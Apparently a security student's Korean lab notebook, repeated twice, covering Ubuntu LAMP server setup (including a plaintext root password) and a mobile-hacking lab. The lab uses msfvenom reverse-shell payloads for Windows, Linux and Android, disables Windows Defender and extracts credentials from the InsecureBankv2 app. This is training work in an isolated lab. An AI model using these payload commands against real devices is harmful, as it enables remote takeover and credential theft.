48일차
●48일차(20250220048.php)
#산특서버 관리
산특관리서버 : 252
> https://192.168.0.252로 접속
> root, p@ssw0rd!@123
1. 서버접속
192.168.0.11 (22011,8011,21011)
> 내 서버임
> 오른쪽 마우스 클릭 > 이름 변경 > st_11
> 전원키기
> 웹에서 리눅스 서버 창이 뜰거임
2. ip 설정, 호스트 네임 설정
nano /etc/netplan/00
192.168.0.11 192.168.0.1 168.126.63.1
netplan apply
nano /etc/hostname
> st_11
3. 점검 후 스냅샷
ping 168.126.63.1
> 잘되는 확인
systemctl start ssh
systemctl enable ssh
> xshell에서 ssh 192.168.0.11
> 접속되는지 확인 후 스냅샷
> 서버에서 오른쪽 마우스 클릭 후 스냅샷
4. 서버 기본 설치
apm ftp 확인
apt -y install net-tools
apt -y install vsftpd
> nano /etc/vsftpd.conf
> writeable 주석 제거
apt -y install php8.1-fpm
a2enmod proxy_fcgi setenvif
a2enconf php8.1-fpm
systemctl restart php8.1-fpm apache2
apt -y install bind9 bind9utils
apt -y install apt lrzsz
apt -y install unzip
apt -y install apache2
apt -y install lamp-server^
apt -y install rsyslog-mysql
cd /var/www/html
nano index.php
nano index.html
<script>location.href='/~master/study/';</script>
> 192.168.0.11을 검색하면 이 경로로 이동하면서 나오는데 경로가 그대로 보임 안보이게 하고싶음
nano /etc/apache2/sitess-available/000-default.conf
> /home/master/public_html/
> 경로 보임 없이 study로 이동함
nano /etc/apache2/apache2.conf > /var/www > /home/master/public_html로 바꿔줘도 된다는데
> index.html 안하고
알드라이브에 가서 192.168.0.92 msh에 있는 내 노트들 빼서 zip 파일로 압축
> xshell로 연결되어있는 내 서버 master 아래에 넣어줬다
#워크 스테이션
workstation에 우분투 22.04 설치
nox 다운로드
> D:\\에 만들어줌
> 설정 > 해상도 모바일용으로 설정
kali > nat dhcp
> xshell로 접속
1. 악성코드 만들기
msfvenom --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.201 LPORT=4444 -b "\x00" -f exe -o window201.exe
> 윈도우용
msfvenom --platform linux -p linux/x86/shell_reverse_tcp LHOST=192.168.0.201 LPORT=4444 -f elf > linux201.elf
> 리눅스용
msfvenom --platform android -p android/meterpreter/reverse_tcp LHOST=192.168.0.201 LPORT=4444 -o mobile201.apk
> 안드로이드용
cd /home/kali
> malware.rc를 경로를 android를 바꿔줌
안드로이드용 만들어서 녹스로 드래그해줌
> msfconsole -r /home/kali/malware.rc
> 녹스에서 악성코드를 클릭하니 연결됨
> 근데 중요한 데이터가 없음
> 가상 은행앱을 설치해줄거임
2. 안드로이드 인세큐어 뱅크v2 다운로드
> 윈도우 디펜더 꺼줘야함
> zip파일 풀고 안에 있는 insecurebankv2.apk를 녹스에 드래그
> 안에 있는 androidserver 디렉토리를 C:\\user\PC1에 넣음
> 디렉토리 안에 app.py가 있다
3. 뱅크앱과 연결하기
Anaconda Prompt
경로 C:\Users\PC1\AndroidLabServer
conda create -n py27 python=2.7
conda activate py27
> (base)가 (py27)
pip install -r requirements.txt
> 이걸 해줘야 파이썬이 작동된다
flask
sqlalchemy
simplejson
web.py
cherry.py
> 이것들을 한번에 다운받아준것
python app.py --help
> port 8888 > 이 포트를 열어주면 연결됨
4. 아이디 비밀번호 알아내기
> 모바일에 저장한 가상 은행앱 아이디 비밀번호를 찾음
5. 외부에서 뱅크앱 연결
python app.py
> 8888 포트번호 열음
> 비밀번호를 치니 상황이 뜸
> ctrl + C 해주니까 성공한 로그가 뜸
6. 리눅스와 안드로이드 구조 차이
platform-tools-latest-windows.zip을 다운받아줌
> 리눅스와 안드로이드의 구조를 비교해보자
adb devices
adb connect 127.0.0.1:62001
adb shell
> ls cd를 해보며 구조를 보자
#산특서버 관리
산특관리서버 : 252
> https://192.168.0.252로 접속
> root, p@ssw0rd!@123
1. 서버접속
192.168.0.11 (22011,8011,21011)
> 내 서버임
> 오른쪽 마우스 클릭 > 이름 변경 > st_11
> 전원키기
> 웹에서 리눅스 서버 창이 뜰거임
2. ip 설정, 호스트 네임 설정
nano /etc/netplan/00
192.168.0.11 192.168.0.1 168.126.63.1
netplan apply
nano /etc/hostname
> st_11
3. 점검 후 스냅샷
ping 168.126.63.1
> 잘되는 확인
systemctl start ssh
systemctl enable ssh
> xshell에서 ssh 192.168.0.11
> 접속되는지 확인 후 스냅샷
> 서버에서 오른쪽 마우스 클릭 후 스냅샷
4. 서버 기본 설치
apm ftp 확인
apt -y install net-tools
apt -y install vsftpd
> nano /etc/vsftpd.conf
> writeable 주석 제거
apt -y install php8.1-fpm
a2enmod proxy_fcgi setenvif
a2enconf php8.1-fpm
systemctl restart php8.1-fpm apache2
apt -y install bind9 bind9utils
apt -y install apt lrzsz
apt -y install unzip
apt -y install apache2
apt -y install lamp-server^
apt -y install rsyslog-mysql
cd /var/www/html
nano index.php
<?php
echo phpinfo();
?>
nano index.html
<script>location.href='/~master/study/';</script>
> 192.168.0.11을 검색하면 이 경로로 이동하면서 나오는데 경로가 그대로 보임 안보이게 하고싶음
nano /etc/apache2/sitess-available/000-default.conf
> /home/master/public_html/
> 경로 보임 없이 study로 이동함
nano /etc/apache2/apache2.conf > /var/www > /home/master/public_html로 바꿔줘도 된다는데
> index.html 안하고
알드라이브에 가서 192.168.0.92 msh에 있는 내 노트들 빼서 zip 파일로 압축
> xshell로 연결되어있는 내 서버 master 아래에 넣어줬다
#워크 스테이션
workstation에 우분투 22.04 설치
nox 다운로드
> D:\\에 만들어줌
> 설정 > 해상도 모바일용으로 설정
kali > nat dhcp
> xshell로 접속
1. 악성코드 만들기
msfvenom --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.201 LPORT=4444 -b "\x00" -f exe -o window201.exe
> 윈도우용
msfvenom --platform linux -p linux/x86/shell_reverse_tcp LHOST=192.168.0.201 LPORT=4444 -f elf > linux201.elf
> 리눅스용
msfvenom --platform android -p android/meterpreter/reverse_tcp LHOST=192.168.0.201 LPORT=4444 -o mobile201.apk
> 안드로이드용
cd /home/kali
> malware.rc를 경로를 android를 바꿔줌
안드로이드용 만들어서 녹스로 드래그해줌
> msfconsole -r /home/kali/malware.rc
> 녹스에서 악성코드를 클릭하니 연결됨
> 근데 중요한 데이터가 없음
> 가상 은행앱을 설치해줄거임
2. 안드로이드 인세큐어 뱅크v2 다운로드
> 윈도우 디펜더 꺼줘야함
> zip파일 풀고 안에 있는 insecurebankv2.apk를 녹스에 드래그
> 안에 있는 androidserver 디렉토리를 C:\\user\PC1에 넣음
> 디렉토리 안에 app.py가 있다
3. 뱅크앱과 연결하기
Anaconda Prompt
경로 C:\Users\PC1\AndroidLabServer
conda create -n py27 python=2.7
conda activate py27
> (base)가 (py27)
pip install -r requirements.txt
> 이걸 해줘야 파이썬이 작동된다
flask
sqlalchemy
simplejson
web.py
cherry.py
> 이것들을 한번에 다운받아준것
python app.py --help
> port 8888 > 이 포트를 열어주면 연결됨
4. 아이디 비밀번호 알아내기
> 모바일에 저장한 가상 은행앱 아이디 비밀번호를 찾음
5. 외부에서 뱅크앱 연결
python app.py
> 8888 포트번호 열음
> 비밀번호를 치니 상황이 뜸
> ctrl + C 해주니까 성공한 로그가 뜸
6. 리눅스와 안드로이드 구조 차이
platform-tools-latest-windows.zip을 다운받아줌
> 리눅스와 안드로이드의 구조를 비교해보자
adb devices
adb connect 127.0.0.1:62001
adb shell
> ls cd를 해보며 구조를 보자